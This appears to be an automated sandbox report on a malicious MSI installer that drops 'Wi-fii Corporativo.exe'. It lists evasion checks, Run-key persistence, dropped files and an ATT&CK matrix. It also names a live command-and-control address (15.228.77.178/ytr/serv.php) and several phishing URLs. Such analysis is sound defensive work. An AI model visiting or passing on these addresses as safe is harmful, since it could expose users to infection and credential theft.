    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 489D0F1
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 33AE2F8
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 3459707
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 476B9C8
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 477FD79
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 42ECE32
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4787335
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 3450ADF
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 457AFAE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 48677AE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 34CC94D
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 43C61E6
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 48A5DCE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 34A9BED
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 44090C3
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4CFD0F1
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4BF65A2
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4CE2A6A
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4CC3672
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4BDFD79
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 47F73EA
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4CCD89A
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 49DAFAE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4BE5720
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4BE7335
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 380E2F8
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 3896F97
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4D05DCE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 49C2413
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4D38C48
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 38B28EA
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 3909BED
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 407FE3C
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4257335
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 42D07BD
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 3E66D38
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4325852
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 424FD79
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4255D72
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 2F06F97
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 2E7E2F8
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 2F20ADF
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 43A8C48
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 2F79BED
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 4375DCE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 3DDAC56
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI/Special instruction interceptor: Address: 2F228EA
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory allocated: 86D0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory allocated: 8BE0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeMemory allocated: 8330000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI28F8.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2995.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2AE0.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI29D5.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2A05.tmpJump to dropped file
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI coverage: 6.1 %
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeAPI coverage: 6.1 %
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_microsoft.window_fce914e429116371317fd6ae8e3a6ad884573e_e281e47e_5794bd2b-1663-4d82-bb7e-b5838504a6be\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_3ff5516a8ab04d5e2061f4da532180c5d2a1080_d6cb0167_5ef81f74-43b2-4a4c-9f72-dafcda16006e\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueueJump to behavior
    Source: Wi-fii Corporativo.exe, 00000007.00000002.2700844378.000000000153E000.00000004.00000020.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3685476076.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_005116F6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_005116F6
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"Jump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_00511253 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00511253
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_005116F6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_005116F6
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_0051188B SetUnhandledExceptionFilter,7_2_0051188B
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 8_2_00511253 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00511253
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 8_2_005116F6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_005116F6
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 8_2_0051188B SetUnhandledExceptionFilter,8_2_0051188B
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_005119BE cpuid 7_2_005119BE
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeCode function: 7_2_005115DE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_005115DE
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: dump.pcap, type: PCAP
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media
    1
    Windows Management Instrumentation
    11
    Registry Run Keys / Startup Folder
    1
    Process Injection
    21
    Masquerading
    1
    Credential API Hooking
    1
    System Time Discovery
    Remote Services1
    Credential API Hooking
    1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    11
    Registry Run Keys / Startup Folder
    1
    Disable or Modify Tools
    LSASS Memory231
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media11
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Virtualization/Sandbox Evasion
    Security Account Manager2
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets11
    Peripheral Device Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    File Deletion
    DCSync123
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1592145 Sample: fiF8mxzUfw.msi Startdate: 15/01/2025 Architecture: WINDOWS Score: 96 44 Suricata IDS alerts for network traffic 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 5 other signatures 2->50 6 msiexec.exe 84 43 2->6         started        9 Wi-fii Corporativo.exe 2 2->9         started        12 Wi-fii Corporativo.exe 2 2->12         started        14 msiexec.exe 2 2->14         started        process3 file4 30 C:\Windows\Installer\MSI2AE0.tmp, PE32 6->30 dropped 32 C:\Windows\Installer\MSI2A05.tmp, PE32 6->32 dropped 34 C:\Windows\Installer\MSI29D5.tmp, PE32 6->34 dropped 36 4 other malicious files 6->36 dropped 16 Wi-fii Corporativo.exe 1 18 6->16         started        20 msiexec.exe 6->20         started        52 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->52 22 WerFault.exe 4 21 9->22         started        24 WerFault.exe 21 9->24         started        26 WerFault.exe 21 12->26         started        28 WerFault.exe 21 12->28         started        signatures5 process6 dnsIp7 38 15.228.77.178, 49711, 80 AMAZON-02US United States 16->38 40 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->40 42 Creates autostart registry keys with suspicious names 16->42 signatures8

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    fiF8mxzUfw.msi13%VirustotalBrowse
    fiF8mxzUfw.msi21%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dll34%ReversingLabs
    C:\Windows\Installer\MSI28F8.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2995.tmp0%ReversingLabs
    C:\Windows\Installer\MSI29D5.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2A05.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2AE0.tmp0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://15.228.77.178/ytr/serv.php0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://15.228.77.178/ytr/serv.phptrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.indyproject.org/Wi-fii Corporativo.exe, 00000007.00000002.2701399669.0000000001701000.00000020.00000001.01000000.00000004.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2712198268.000000000683F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3690828895.0000000005D7F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3685884269.0000000000D71000.00000020.00000001.01000000.00000004.sdmpfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      15.228.77.178
      unknownUnited States
      16509AMAZON-02UStrue
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1592145
      Start date and time:2025-01-15 20:34:16 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 8m 45s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:17
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:fiF8mxzUfw.msi
      renamed because original name is a hash value
      Original Sample Name:e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05.msi
      Detection:MAL
      Classification:mal96.troj.evad.winMSI@12/46@0/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 2
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .msi
      • Override analysis time to 240000 for current running targets taking high CPU consumption
      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
      • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.73.29, 20.189.173.21, 4.245.163.56, 13.107.246.45, 20.190.159.64
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      14:35:20API Interceptor1x Sleep call for process: Wi-fii Corporativo.exe modified
      14:36:12API Interceptor4x Sleep call for process: WerFault.exe modified
      20:35:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
      20:35:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wi-fii Corporativo.exe C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      15.228.77.178SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
        SecuriteInfo.com.Variant.Barys.394881.27394.14169.dllGet hashmaliciousUnknownBrowse
          f_4_T_u_r_4_34536_45645_3345_wo.msiGet hashmaliciousUnknownBrowse
            n_f_3_e_l_3_t_r_0_n_1_k_4_00545.msiGet hashmaliciousUnknownBrowse
              n_f_3_f_1_s_k_4_l.msiGet hashmaliciousUnknownBrowse
                Mandado-Intima#U00e7#U00e3o_Art516mlhg.msiGet hashmaliciousUnknownBrowse
                  z12A____o-Trabalhista.msiGet hashmaliciousUnknownBrowse
                    z1F_4_T_U_r_4_2024mfdfgryry5.msiGet hashmaliciousUnknownBrowse
                      F_4_T_U_R_4___nf____0992344.4354.msiGet hashmaliciousUnknownBrowse
                        rPEDIDOS-10032023-X491kkum.msiGet hashmaliciousUnknownBrowse
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AMAZON-02USHandler.exeGet hashmaliciousDanaBot, PureLog Stealer, VidarBrowse
                          • 108.139.47.33
                          https://fingertip.com/incoming-documentGet hashmaliciousHTMLPhisherBrowse
                          • 3.5.169.67
                          https://q89x88qh.r.ap-southeast-1.awstrack.me/L0/https:%2F%2Fblackdoor.in%2Fcazxccall%2Frtyucallingzxc%2F/1/010e01946a4fedf7-6a14e9da-4611-4b34-a7c5-f58f00519f0d-000000/p9HvzYrykwYBivTgZCa5Kf2-wBc=194Get hashmaliciousUnknownBrowse
                          • 52.74.136.124
                          https://lgray785.wixsite.com/my-site-4Get hashmaliciousHTMLPhisherBrowse
                          • 99.86.4.105
                          New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                          • 13.248.169.48
                          QQE81XYXon.dllGet hashmaliciousWannacryBrowse
                          • 63.35.17.92
                          PO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 13.248.169.48
                          txWVWM8Kx4.dllGet hashmaliciousWannacryBrowse
                          • 52.34.64.1
                          hNgIvHRuTU.dllGet hashmaliciousWannacryBrowse
                          • 13.229.164.57
                          https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQGet hashmaliciousUnknownBrowse
                          • 18.245.46.111
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Windows\Installer\MSI28F8.tmp2tytrCyNuF.msiGet hashmaliciousUnknownBrowse
                            msit.exeGet hashmaliciousLummaC StealerBrowse
                              msit.msiGet hashmaliciousLummaC StealerBrowse
